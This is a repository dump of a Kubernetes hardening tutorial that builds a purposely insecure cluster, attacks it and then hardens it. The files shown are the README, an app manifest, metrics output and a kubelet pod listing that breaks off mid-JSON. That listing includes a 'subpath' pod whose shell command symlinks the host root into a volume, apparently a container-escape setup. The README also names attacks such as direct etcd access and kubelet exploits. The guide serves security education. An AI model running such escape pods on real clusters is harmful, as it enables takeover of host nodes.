├── .gitignore ├── README.md ├── azure-vote.yml ├── boltbrowser.darwin64 ├── docs ├── cmd │ ├── cadvisor-metrics.md │ ├── kube-proxy-metrics.md │ ├── kubelet-metrics-cadvisor.md │ ├── kubelet-metrics.md │ ├── kubelet-pods.md │ └── kubelet-spec.md ├── create-kubeconfig.md ├── create-vpc.md ├── delete-instances.md ├── delete-vpc.md ├── deploy-basic-dashboard.md ├── deploy-heapster.md ├── deploy-kube-dns.md ├── deploy-voteapp.md ├── deploy-vulnapp.md ├── direct-controller.md ├── direct-etcd.md ├── direct-worker.md ├── enumerate-ports.md ├── full-original.md ├── kubelet-exploit.md ├── l1-api-tls.md ├── l1-security-groups.md ├── launch-configure-controller.md ├── launch-configure-etcd.md └── launch-configure-workers.md ├── etcd.dump ├── etcdctl ├── img └── arch.png └── templates └── hkfs.json /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | *.pem 3 | *.json 4 | *.csr 5 | kubeconfig 6 | *.dump 7 | *.raw 8 | etcdctl 9 | boltbrowser* 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hardening Kubernetes from Scratch 2 | 3 | The community continues to benefit from [Kubernetes the Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way) by Kelsey Hightower in understanding how each of the components work together and are configured in a reasonably secure manner, step-by-step. In a similar manner but using a slightly different approach, this guide attempts to demonstrate how the security-related settings inside ```kubernetes``` actually work from the ground up, one change at a time, validated by real attacks where possible. 4 | 5 | By following this guide, you will configure one of the *least secure* clusters possible at the start. Each step will attempt to follow the pattern of a) educate, b) attack, c) harden, and d) verify in order of security importance and maturity. Upon completion of the guide, you will have successfully hacked your cluster several times over and now fully understand all the necessary configuration changes to prevent each one from happening. 6 | 7 | This guide will hopefully do a better job explaining all the angles that couldn't fit into a [single KubeCon talk](https://www.youtube.com/watch?v=vTgQLzeBfRU). 8 | 9 | > NOTE: The cluster built in this tutorial is not production ready--especially at the beginning--but the concepts learned are definitely applicable to your production clusters. 10 | 11 | ## Target Audience 12 | 13 | The target audience for this tutorial is someone who has a working knowledge of running a Kubernetes cluster (or has completed the ```kubernetes-the-hard-way``` tutorial) and wants to understand how each security-related setting works at a deep level. 14 | 15 | ## Cluster Software Details 16 | 17 | - [AWS EC2](https://aws.amazon.com/ec2/) 18 | - [Ubuntu 16.0.4 LTS](http://cloud-images.ubuntu.com/locator/ec2/) and search for `16.04 LTS hvm:ebs-ssd` 19 | - [Docker 1.13.x](https://www.docker.com) 20 | - [CNI Container Networking](https://github.com/containernetworking/cni) 0.6.0 21 | - [etcd](https://github.com/coreos/etcd) 3.2.11 22 | - [Kubernetes](https://github.com/kubernetes/kubernetes) 1.9.2 23 | 24 | 25 | ## Pre-Requisite Tools 26 | 27 | - AWS Account Credentials with permissions to: 28 | - Create/delete VPC (subnets, route tables, internet gateways) 29 | - Create/delete Cloudformation 30 | - Create/delete EC2 * (security groups, keypairs, instances) 31 | - AWS cli tools configured to use said account 32 | - bash 33 | - git 34 | - dig 35 | - kubectl (v1.9.2) 36 | - cfssl 37 | 38 | ## The (Purposefully) Insecure Cluster 39 | 40 | ### Cluster System Details 41 | 42 | - Etcd - t2.micro (10.1.0.5) 43 | - Controller - t2.small (10.1.0.10) 44 | - Worker1 - t2.small (10.1.0.11) 45 | - Worker2 - t2.small (10.1.0.12) 46 | 47 | AWS costs in `us-east-1` are just under $2/day. 48 | 49 | ### Diagram/Structure 50 | 51 | ![Cluster Architecture](img/arch.png) 52 | 53 | To keep things simple, this guide is based on a single VPC, single availability zone, single subnet architecture where all nodes have static private IPs, are assigned public IPs to enable direct SSH access, and share a security group that allows each node to have full network access to each other. 54 | 55 | ### Labs 56 | 57 | #### Build the Cluster 58 | 59 | These steps will guide you through creating the VPC, subnet, instances, and basic cluster configuration without any hardening measures in place. Pay special attention to the configuration of the security group to ensure only you have access to these systems! 60 | 61 | 1. [Create the VPC](docs/create-vpc.md) 62 | 2. [Launch and configure the `etcd` instance](docs/launch-configure-etcd.md) 63 | 3. [Launch and configure the `controller` instance](docs/launch-configure-controller.md) 64 | 4. [Launch and configure the `worker-1` and `worker-2` instance](docs/launch-configure-workers.md) 65 | 5. [Create the local `kubeconfig` file](docs/create-kubeconfig.md) 66 | 67 | #### Level 0 Security 68 | 69 | The following items are to be deployed to fulfill basic Kubernetes cluster functionality. The steps purposefully omit any security-related configuration/hardening. 70 | 71 | 1. [Deploy kube-dns](docs/deploy-kube-dns.md) 72 | 2. [Deploy Heapster](docs/deploy-heapster.md) 73 | 3. [Deploy Dashboard](docs/deploy-basic-dashboard.md) 74 | 75 | #### Level 0 Attacks 76 | 77 | At this most basic level, "Level 0", the current configuration offers very little (if any) protection from attacks that can take complete control of the the cluster and its nodes. 78 | 79 | 1. [Enumerate exposed ports](docs/enumerate-ports.md) on the nodes and identify their corresponding services 80 | 2. [Probing Etcd](docs/direct-etcd.md) to compromise the data store 81 | 3. [Probing the Controller](docs/direct-controller.md) to access the API and other control plane services 82 | 4. [Probing the Worker](docs/direct-worker.md) to access the Kubelet and other worker services 83 | 84 | #### Level 1 Hardening 85 | 86 | Ouch! The security configuration of "Level 0" is not resistant to remote attacks. Let's do the very basic steps to prevent the "Level 0" attacks from being so straightforward. 87 | 88 | 1. [Improve the security group](docs/l1-security-groups.md) configuration 89 | 2. [Enable TLS](docs/l1-api-tls.md) on the externally exposed Kubernetes API 90 | 91 | #### Deploy Application Workloads 92 | 93 | With that modest amount of hardening, it's time to have this cluster perform some work. Let's deploy two sample applications: 94 | 95 | 1. [Install the "Vulnerable" application](docs/deploy-vulnapp.md) 96 | 2. [Install the Azure Vote App](docs/deploy-voteapp.md) 97 | 98 | #### Level 1 Attacks 99 | 100 | At this point, there are some fundamental resource exhaustion problems that authorized users may purposefully (or accidentally) trigger. Without any boundaries in place, deploying too many pods or pods that consume too much CPU/RAM shares can cause serious cluster availability/Denial of Service issues. When the cluster is "full", any new pods will not be scheduled. 101 | 102 | 1. Launch too many pods 103 | 2. Launch pods that consume too many CPU/RAM shares 104 | 3. Launch pods that consume all available disk space and/or inodes. 105 | 106 | #### Level 2 Hardening 107 | 108 | In order to provide the proper boundaries around workloads and their resources, using separate namespaces and corresponding resource quotas can prevent the "Level 1" issues. 109 | 110 | 1. Separate workloads using Namespaces 111 | 2. Set specific Request/Limits on Pods 112 | 3. Enforce Namespace Resource Quotas 113 | 5. Discuss multi-etcd, multi-controller 114 | 115 | #### Level 2 Attacks 116 | 1. Malicious Image, Compromised Container, Multi-tenant Misuse 117 | - Service Account Tokens 118 | - Dashboard Access 119 | - Direct Etcd Access 120 | - Tiller Access 121 | - Kubelet Exploit 122 | - Application Tampering 123 | - Metrics Scraping 124 | - Metadata API 125 | - Outbound Scanning/pivoting 126 | 127 | #### Level 3 Hardening 128 | 1. RBAC 129 | 2. Etcd TLS 130 | 2. New Dashboard 131 | 3. Separate Kubeconfigs per user 132 | 4. Tiller TLS 133 | 5. Kubelet Authn/z 134 | 6. Network Policy/CNI 135 | 7. Admission Controllers 136 | 8. Logging? 137 | 138 | #### Level 4 Attacks 139 | 1. Malicious Image, Compromised Container, Multi-tenant Misuse 140 | - Escape the container 141 | 142 | #### Level 4 Hardening 143 | 1. Advanced admission controllers 144 | 2. Restrict images/sources 145 | 3. Network Egress filtering 146 | 4. Vuln scan images 147 | 5. Pod Security Policy 148 | 6. Encrypted etcd 149 | 7. Sysdig Falco 150 | 151 | ### Clean Up 152 | 1. [Delete Instances](docs/delete-instances.md) 153 | 2. [Delete VPC](docs/delete-vpc.md) 154 | 155 | ## Next Steps 156 | - [Kubernetes the Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way) - Kelsey Hightower 157 | -------------------------------------------------------------------------------- /azure-vote.yml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: azure-vote-back 5 | spec: 6 | replicas: 1 7 | template: 8 | metadata: 9 | labels: 10 | app: azure-vote-back 11 | spec: 12 | containers: 13 | - name: azure-vote-back 14 | image: redis 15 | ports: 16 | - containerPort: 6379 17 | name: redis 18 | --- 19 | apiVersion: v1 20 | kind: Service 21 | metadata: 22 | name: azure-vote-back 23 | spec: 24 | ports: 25 | - port: 6379 26 | selector: 27 | app: azure-vote-back 28 | --- 29 | apiVersion: apps/v1beta1 30 | kind: Deployment 31 | metadata: 32 | name: azure-vote-front 33 | spec: 34 | replicas: 1 35 | strategy: 36 | rollingUpdate: 37 | maxSurge: 1 38 | maxUnavailable: 1 39 | minReadySeconds: 5 40 | template: 41 | metadata: 42 | labels: 43 | app: azure-vote-front 44 | spec: 45 | containers: 46 | - name: azure-vote-front 47 | image: microsoft/azure-vote-front:v1 48 | ports: 49 | - containerPort: 80 50 | resources: 51 | requests: 52 | cpu: 250m 53 | limits: 54 | cpu: 500m 55 | env: 56 | - name: REDIS 57 | value: "azure-vote-back" 58 | -------------------------------------------------------------------------------- /boltbrowser.darwin64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/boltbrowser.darwin64 -------------------------------------------------------------------------------- /docs/cmd/kube-proxy-metrics.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | # HELP go_gc_duration_seconds A summary of the GC invocation durations. 5 | # TYPE go_gc_duration_seconds summary 6 | go_gc_duration_seconds{quantile="0"} 1.4315e-05 7 | go_gc_duration_seconds{quantile="0.25"} 1.6346e-05 8 | go_gc_duration_seconds{quantile="0.5"} 1.7508e-05 9 | go_gc_duration_seconds{quantile="0.75"} 1.8822e-05 10 | go_gc_duration_seconds{quantile="1"} 0.000170554 11 | go_gc_duration_seconds_sum 0.14788704 12 | go_gc_duration_seconds_count 7560 13 | # HELP go_goroutines Number of goroutines that currently exist. 14 | # TYPE go_goroutines gauge 15 | go_goroutines 46 16 | # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. 17 | # TYPE go_memstats_alloc_bytes gauge 18 | go_memstats_alloc_bytes 5.414368e+06 19 | # HELP go_memstats_alloc_bytes_total Total number of bytes allocated, even if freed. 20 | # TYPE go_memstats_alloc_bytes_total counter 21 | go_memstats_alloc_bytes_total 3.90601344e+09 22 | # HELP go_memstats_buck_hash_sys_bytes Number of bytes used by the profiling bucket hash table. 23 | # TYPE go_memstats_buck_hash_sys_bytes gauge 24 | go_memstats_buck_hash_sys_bytes 1.657035e+06 25 | # HELP go_memstats_frees_total Total number of frees. 26 | # TYPE go_memstats_frees_total counter 27 | go_memstats_frees_total 5.6292182e+07 28 | # HELP go_memstats_gc_cpu_fraction The fraction of this program's available CPU time used by the GC since the program started. 29 | # TYPE go_memstats_gc_cpu_fraction gauge 30 | go_memstats_gc_cpu_fraction 3.5323944520522376e-05 31 | # HELP go_memstats_gc_sys_bytes Number of bytes used for garbage collection system metadata. 32 | # TYPE go_memstats_gc_sys_bytes gauge 33 | go_memstats_gc_sys_bytes 516096 34 | # HELP go_memstats_heap_alloc_bytes Number of heap bytes allocated and still in use. 35 | # TYPE go_memstats_heap_alloc_bytes gauge 36 | go_memstats_heap_alloc_bytes 5.414368e+06 37 | # HELP go_memstats_heap_idle_bytes Number of heap bytes waiting to be used. 38 | # TYPE go_memstats_heap_idle_bytes gauge 39 | go_memstats_heap_idle_bytes 1.400832e+06 40 | # HELP go_memstats_heap_inuse_bytes Number of heap bytes that are in use. 41 | # TYPE go_memstats_heap_inuse_bytes gauge 42 | go_memstats_heap_inuse_bytes 7.479296e+06 43 | # HELP go_memstats_heap_objects Number of allocated objects. 44 | # TYPE go_memstats_heap_objects gauge 45 | go_memstats_heap_objects 29224 46 | # HELP go_memstats_heap_released_bytes Number of heap bytes released to OS. 47 | # TYPE go_memstats_heap_released_bytes gauge 48 | go_memstats_heap_released_bytes 1.253376e+06 49 | # HELP go_memstats_heap_sys_bytes Number of heap bytes obtained from system. 50 | # TYPE go_memstats_heap_sys_bytes gauge 51 | go_memstats_heap_sys_bytes 8.880128e+06 52 | # HELP go_memstats_last_gc_time_seconds Number of seconds since 1970 of last garbage collection. 53 | # TYPE go_memstats_last_gc_time_seconds gauge 54 | go_memstats_last_gc_time_seconds 1.522204157873937e+09 55 | # HELP go_memstats_lookups_total Total number of pointer lookups. 56 | # TYPE go_memstats_lookups_total counter 57 | go_memstats_lookups_total 3.74748e+06 58 | # HELP go_memstats_mallocs_total Total number of mallocs. 59 | # TYPE go_memstats_mallocs_total counter 60 | go_memstats_mallocs_total 5.6321406e+07 61 | # HELP go_memstats_mcache_inuse_bytes Number of bytes in use by mcache structures. 62 | # TYPE go_memstats_mcache_inuse_bytes gauge 63 | go_memstats_mcache_inuse_bytes 1736 64 | # HELP go_memstats_mcache_sys_bytes Number of bytes used for mcache structures obtained from system. 65 | # TYPE go_memstats_mcache_sys_bytes gauge 66 | go_memstats_mcache_sys_bytes 16384 67 | # HELP go_memstats_mspan_inuse_bytes Number of bytes in use by mspan structures. 68 | # TYPE go_memstats_mspan_inuse_bytes gauge 69 | go_memstats_mspan_inuse_bytes 100472 70 | # HELP go_memstats_mspan_sys_bytes Number of bytes used for mspan structures obtained from system. 71 | # TYPE go_memstats_mspan_sys_bytes gauge 72 | go_memstats_mspan_sys_bytes 114688 73 | # HELP go_memstats_next_gc_bytes Number of heap bytes when next garbage collection will take place. 74 | # TYPE go_memstats_next_gc_bytes gauge 75 | go_memstats_next_gc_bytes 1.0238944e+07 76 | # HELP go_memstats_other_sys_bytes Number of bytes used for other system allocations. 77 | # TYPE go_memstats_other_sys_bytes gauge 78 | go_memstats_other_sys_bytes 491565 79 | # HELP go_memstats_stack_inuse_bytes Number of bytes in use by the stack allocator. 80 | # TYPE go_memstats_stack_inuse_bytes gauge 81 | go_memstats_stack_inuse_bytes 557056 82 | # HELP go_memstats_stack_sys_bytes Number of bytes obtained from system for stack allocator. 83 | # TYPE go_memstats_stack_sys_bytes gauge 84 | go_memstats_stack_sys_bytes 557056 85 | # HELP go_memstats_sys_bytes Number of bytes obtained from system. 86 | # TYPE go_memstats_sys_bytes gauge 87 | go_memstats_sys_bytes 1.2232952e+07 88 | # HELP go_threads Number of OS threads created 89 | # TYPE go_threads gauge 90 | go_threads 6 91 | # HELP http_request_duration_microseconds The HTTP request latencies in microseconds. 92 | # TYPE http_request_duration_microseconds summary 93 | http_request_duration_microseconds{handler="prometheus",quantile="0.5"} NaN 94 | http_request_duration_microseconds{handler="prometheus",quantile="0.9"} NaN 95 | http_request_duration_microseconds{handler="prometheus",quantile="0.99"} NaN 96 | http_request_duration_microseconds_sum{handler="prometheus"} 7457.3460000000005 97 | http_request_duration_microseconds_count{handler="prometheus"} 3 98 | # HELP http_request_size_bytes The HTTP request sizes in bytes. 99 | # TYPE http_request_size_bytes summary 100 | http_request_size_bytes{handler="prometheus",quantile="0.5"} NaN 101 | http_request_size_bytes{handler="prometheus",quantile="0.9"} NaN 102 | http_request_size_bytes{handler="prometheus",quantile="0.99"} NaN 103 | http_request_size_bytes_sum{handler="prometheus"} 192 104 | http_request_size_bytes_count{handler="prometheus"} 3 105 | # HELP http_requests_total Total number of HTTP requests made. 106 | # TYPE http_requests_total counter 107 | http_requests_total{code="200",handler="prometheus",method="get"} 3 108 | # HELP http_response_size_bytes The HTTP response sizes in bytes. 109 | # TYPE http_response_size_bytes summary 110 | http_response_size_bytes{handler="prometheus",quantile="0.5"} NaN 111 | http_response_size_bytes{handler="prometheus",quantile="0.9"} NaN 112 | http_response_size_bytes{handler="prometheus",quantile="0.99"} NaN 113 | http_response_size_bytes_sum{handler="prometheus"} 50521 114 | http_response_size_bytes_count{handler="prometheus"} 3 115 | # HELP kubeproxy_sync_proxy_rules_latency_microseconds SyncProxyRules latency 116 | # TYPE kubeproxy_sync_proxy_rules_latency_microseconds histogram 117 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1000"} 1 118 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="2000"} 1 119 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="4000"} 1 120 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="8000"} 1 121 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="16000"} 26338 122 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="32000"} 30181 123 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="64000"} 30203 124 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="128000"} 30209 125 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="256000"} 30211 126 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="512000"} 30211 127 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1.024e+06"} 30218 128 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="2.048e+06"} 30218 129 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="4.096e+06"} 30218 130 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="8.192e+06"} 30218 131 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1.6384e+07"} 30218 132 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="+Inf"} 30218 133 | kubeproxy_sync_proxy_rules_latency_microseconds_sum 4.1572652e+08 134 | kubeproxy_sync_proxy_rules_latency_microseconds_count 30218 135 | # HELP kubernetes_build_info A metric with a constant '1' value labeled by major, minor, git version, git commit, git tree state, build date, Go version, and compiler from which Kubernetes was built, and platform on which it is running. 136 | # TYPE kubernetes_build_info gauge 137 | kubernetes_build_info{buildDate="2018-01-18T09:42:01Z",compiler="gc",gitCommit="5fa2db2bd46ac79e5e00a4e6ed24191080aa463b",gitTreeState="clean",gitVersion="v1.9.2",goVersion="go1.9.2",major="1",minor="9",platform="linux/amd64"} 1 138 | # HELP process_cpu_seconds_total Total user and system CPU time spent in seconds. 139 | # TYPE process_cpu_seconds_total counter 140 | process_cpu_seconds_total 763.05 141 | # HELP process_max_fds Maximum number of open file descriptors. 142 | # TYPE process_max_fds gauge 143 | process_max_fds 1024 144 | # HELP process_open_fds Number of open file descriptors. 145 | # TYPE process_open_fds gauge 146 | process_open_fds 12 147 | # HELP process_resident_memory_bytes Resident memory size in bytes. 148 | # TYPE process_resident_memory_bytes gauge 149 | process_resident_memory_bytes 3.6507648e+07 150 | # HELP process_start_time_seconds Start time of the process since unix epoch in seconds. 151 | # TYPE process_start_time_seconds gauge 152 | process_start_time_seconds 1.52129734617e+09 153 | # HELP process_virtual_memory_bytes Virtual memory size in bytes. 154 | # TYPE process_virtual_memory_bytes gauge 155 | process_virtual_memory_bytes 5.1458048e+07 156 | # HELP rest_client_request_latency_seconds Request latency in seconds. Broken down by verb and URL. 157 | # TYPE rest_client_request_latency_seconds histogram 158 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.001"} 10 159 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.002"} 10 160 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.004"} 11 161 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.008"} 11 162 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.016"} 12 163 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.032"} 12 164 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.064"} 12 165 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.128"} 12 166 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.256"} 12 167 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.512"} 12 168 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="+Inf"} 12 169 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 0.015057069 170 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 12 171 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.001"} 2 172 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.002"} 2 173 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.004"} 3 174 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.008"} 3 175 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.016"} 3 176 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.032"} 3 177 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.064"} 3 178 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.128"} 3 179 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.256"} 3 180 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.512"} 3 181 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="+Inf"} 3 182 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST"} 0.00392318 183 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST"} 3 184 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.001"} 0 185 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.002"} 0 186 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.004"} 0 187 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.008"} 1 188 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.016"} 1 189 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.032"} 1 190 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.064"} 1 191 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.128"} 1 192 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.256"} 1 193 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.512"} 1 194 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="+Inf"} 1 195 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET"} 0.007660857 196 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET"} 1 197 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.001"} 11 198 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.002"} 11 199 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.004"} 11 200 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.008"} 11 201 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.016"} 12 202 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.032"} 12 203 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.064"} 12 204 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.128"} 12 205 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.256"} 12 206 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.512"} 12 207 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="+Inf"} 12 208 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 0.01068198 209 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 12 210 | # HELP rest_client_requests_total Number of HTTP requests, partitioned by status code, method, and host. 211 | # TYPE rest_client_requests_total counter 212 | rest_client_requests_total{code="200",host="10.1.0.10:8080",method="GET"} 4042 213 | rest_client_requests_total{code="201",host="10.1.0.10:8080",method="POST"} 1 214 | rest_client_requests_total{code="",host="10.1.0.10:8080",method="GET"} 23 215 | rest_client_requests_total{code="",host="10.1.0.10:8080",method="POST"} 2 216 | ``` 217 | -------------------------------------------------------------------------------- /docs/cmd/kubelet-pods.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | { 5 | "kind": "PodList", 6 | "apiVersion": "v1", 7 | "metadata": {}, 8 | "items": [ 9 | { 10 | "metadata": { 11 | "name": "subpath", 12 | "namespace": "default", 13 | "selfLink": "/api/v1/namespaces/default/pods/subpath", 14 | "uid": "3fb02fa6-2e9e-11e8-9d04-06d7638bd978", 15 | "resourceVersion": "418027", 16 | "creationTimestamp": "2018-03-23T13:29:44Z", 17 | "annotations": { 18 | "kubernetes.io/config.seen": "2018-03-23T13:29:44.306996903Z", 19 | "kubernetes.io/config.source": "api" 20 | } 21 | }, 22 | "spec": { 23 | "volumes": [ 24 | { 25 | "name": "escape-volume", 26 | "emptyDir": {} 27 | }, 28 | { 29 | "name": "status-volume", 30 | "emptyDir": {} 31 | } 32 | ], 33 | "containers": [ 34 | { 35 | "name": "setup", 36 | "image": "nginx:latest", 37 | "command": [ 38 | "/bin/bash" 39 | ], 40 | "args": [ 41 | "-c", 42 | "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity" 43 | ], 44 | "resources": {}, 45 | "volumeMounts": [ 46 | { 47 | "name": "escape-volume", 48 | "mountPath": "/rootfs" 49 | }, 50 | { 51 | "name": "status-volume", 52 | "mountPath": "/status" 53 | } 54 | ], 55 | "terminationMessagePath": "/dev/termination-log", 56 | "terminationMessagePolicy": "File", 57 | "imagePullPolicy": "Always", 58 | "securityContext": { 59 | "capabilities": { 60 | "drop": [ 61 | "CHOWN", 62 | "DAC_OVERRIDE", 63 | "FOWNER", 64 | "FSETID", 65 | "KILL", 66 | "SETGID", 67 | "SETUID", 68 | "SETPCAP", 69 | "NET_BIND_SERVICE", 70 | "NET_ADMIN", 71 | "NET_RAW", 72 | "MKNOD", 73 | "AUDIT_WRITE" 74 | ] 75 | }, 76 | "allowPrivilegeEscalation": false 77 | } 78 | }, 79 